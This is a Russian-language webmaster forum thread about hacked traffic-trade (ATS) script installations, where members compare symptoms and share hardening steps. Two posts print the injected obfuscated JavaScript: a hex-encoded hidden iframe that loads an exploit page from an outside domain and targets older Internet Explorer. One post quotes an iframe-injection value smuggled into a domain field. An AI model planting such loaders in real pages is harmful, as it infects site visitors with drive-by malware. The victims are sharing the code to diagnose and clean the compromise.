Новая тема   Ответить

 Don Juan
добавился какой-то хxx

по мылу пришло
domain: masex.com\"><iframe_width=1_height=1_src=http

ни посмотреть не могу, ни удалить из админки
пишет при удалении

Warning: opendir(./tradefiles/masex.com\\\\/) [function.opendir]: failed to open dir: No such file or directory in blablablablabla/public_html/inc0.php on line 594


скрипт АТС
саппорт молчит пока
кто-нить сталкивался?

Последний раз редактировалось: Don Juan (06/11/08 в 02:56), всего редактировалось 1 раз

 AdBizWork
мне тоже добавился
отметь галочкой и нажми кнопку "удалить"

 Don Juan
удалился....

ошибка вылетала, но он удалился
вопрос решен

 sllimm
У меня тоже добавился, но я ничего не делал, он сам пропал с админки.

 AlexanderX
У меня тоже добавилось что-то подобное. Удалил без проблем вроде.

 Starforce
пришла пора АТС ?

 rusawm
походу взломали

 von Stoltz
Пытаются периодически ломать, значит скрипт становится популярным. Для предотвращения заюзайте встроенную капчу, это говно добавляется ботом, а он капчу не пройдет. В аське завтра буду обязательно, тс постучи, мне интересно содержание мыла.

 Grach
гм, эта гнида кусочек себя пишет в Settings -> Trade rules
гляньте у кого там че вписано после рулесов

 Don Juan
von Stoltz писал:


я незнаю твоей аси, с саппортом общаюсь
моя 37908982nine

 Don Juan
Grach писал:

+1 проверяйте!
и кто найдет отпишите здесь, я удалил сразу в буффер не скопировалось мля

 Wskeal
а че там написано то.

 sllimm
У меня появилось:
1.No illegal sites 2.No sites with consoles 3.no exploits, viruses, dialers, active-x, etc. Код:

 Don Juan
тоже самое было

 Pashich
тоже такое было...

а вот щас обнаружил что в код темлейта посередине вот эта хрень прописалась и каспер орёт что троян и эксплоит... бля..

<script> var s='3C696672616D65207372633D22687474703A2F2F6C657A6875
6E7465722E636F6D2F73742F6373732F7A2F7374617469632E7068702220686569
6768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474
683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2)
{ var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var
v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1
&& v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

удалил а он сцука опять через время появляется

 Quutamo
та же история... добавился ко мне на 1 сайт, а код изменил и exploit грузит на всех сиджах находящихся на серваке... вэри бэд...

 von Stoltz
209 905 775. Рекомендуется еще зашифровать пароль на админку, это делается галкой secure в settings, поменять темплейт через webmaster.php нереально, видимо ломают админку или фтп

 Gidz
Бля, заблокировали сайт, что за херня, что теперь делать? В админку зайти не могу, как убить эту хрень? И как в ATS закрыть авторегистрацию?

 Soft-Com
у кого поломали домены - скиньте плс аксес-логи апача (сутки от времени взлома и до времени взлома), буду премного благодарен.

 von Stoltz
зайти через фтп, темплейт находится в файле ./templates/default_1.tpl и других .tpl в этой папке. Файлы установок в папке ./settings, поставьте права 644 на темплейт и файлы установок после завершения их редактирования и зашифруйте пароль и хрен какая сука вломится. И закройте авторегистрацию Settings-Trade Settings-Default Status-No New Trades

 Don Juan
а если Disabled?

 Gidz
это оно?
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E63656C6562726974796E796D70686F2E6
36F6D2F73742F6E69636865732F7A2F7374617469632E70687022206865696768743D223222207374796
C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

 von Stoltz
disabled не поможет, кого поломали, постучите в асю плиз. Нужно понимать в какие файлы вносятся изменения чтобы сделать заплатку.

 Gidz
а куда стукать то? какая ася? 11438640пять?

 Wskeal
тоже как-то было такое. Саппорт трафикхолдера написал, что у меня иксплойт, удалил код и все стало нормуль.